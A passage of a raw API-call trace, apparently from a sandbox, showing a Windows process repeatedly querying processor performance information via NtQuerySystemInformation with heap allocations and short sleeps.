NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.905] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0276.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0276.905] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.906] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0276.906] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0276.906] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.906] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0276.906] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0276.906] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0276.907] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0276.907] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0276.907] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0276.907] Sleep (dwMilliseconds=0x110) [0276.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0276.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0276.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0276.926] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0276.926] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0276.926] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0276.927] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0276.927] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0276.927] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0276.927] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0276.927] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0276.927] Sleep (dwMilliseconds=0x110) [0276.979] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0276.979] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.979] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0276.979] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0276.979] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.980] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0276.980] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0276.980] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0276.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0276.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0276.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0276.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0276.989] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0276.989] Sleep (dwMilliseconds=0x110) [0277.066] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0277.067] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0277.067] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0277.067] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0277.067] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0277.068] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0277.068] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0277.068] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0277.069] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0277.069] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0277.069] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0277.069] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0277.069] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0277.070] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0277.070] Sleep (dwMilliseconds=0x110) [0277.115] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0277.115] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0277.116] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0277.116] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0277.116] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0277.116] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0277.116] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0277.116] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0277.117] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0277.117] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0277.117] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0277.117] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0277.121] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0277.122] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0277.123] Sleep (dwMilliseconds=0x110) [0277.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0277.169] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0277.169] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0277.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0277.206] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0277.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0277.207] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0277.207] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0277.208] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0277.208] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0277.208] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0277.209] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0277.209] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0277.209] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0277.209] Sleep (dwMilliseconds=0x110) [0277.816] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0277.816] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0277.817] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0277.817] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0277.817] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0277.818] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0277.818] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0277.818] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0277.818] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0277.818] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0277.818] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0277.819] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0277.819] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0277.819] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0277.819] Sleep (dwMilliseconds=0x110) [0277.836] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0277.836] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0277.837] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0277.837] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0277.837] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0277.838] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0277.838] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0277.838] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0277.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0277.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0277.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0277.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0277.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0277.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0277.941] Sleep (dwMilliseconds=0x110) [0278.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0278.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0278.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0278.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0278.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0278.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0278.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0278.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0278.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0278.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0278.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0278.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0278.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0278.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0278.051] Sleep (dwMilliseconds=0x110) [0278.197] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0278.197] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0278.198] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0278.198] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0278.198] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0278.198] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0278.199] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0278.199] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0278.199] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0278.199] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0278.199] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0278.200] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0278.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0278.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0278.409] Sleep (dwMilliseconds=0x110) [0278.619] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0278.619] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0278.619] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0278.619] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0278.619] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0278.620] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0278.620] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0278.620] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0278.621] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0278.623] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0278.623] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0278.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0278.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0278.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0278.626] Sleep (dwMilliseconds=0x110) [0278.785] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0278.785] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0278.786] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0278.786] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0278.786] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0278.786] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0278.787] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0278.787] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0278.787] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0278.787] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0278.787] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0278.788] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0278.788] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0278.788] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0278.788] Sleep (dwMilliseconds=0x110) [0278.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0278.863] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0278.864] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0278.864] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0278.864] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0278.864] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0278.864] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0278.864] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0278.865] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0278.865] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0278.865] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0278.865] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0278.865] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0278.866] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0278.866] Sleep (dwMilliseconds=0x110) [0278.873] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0278.873] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0278.874] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0278.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0278.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0278.874] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0278.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0278.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0278.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0278.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0278.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0278.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0278.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0278.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, 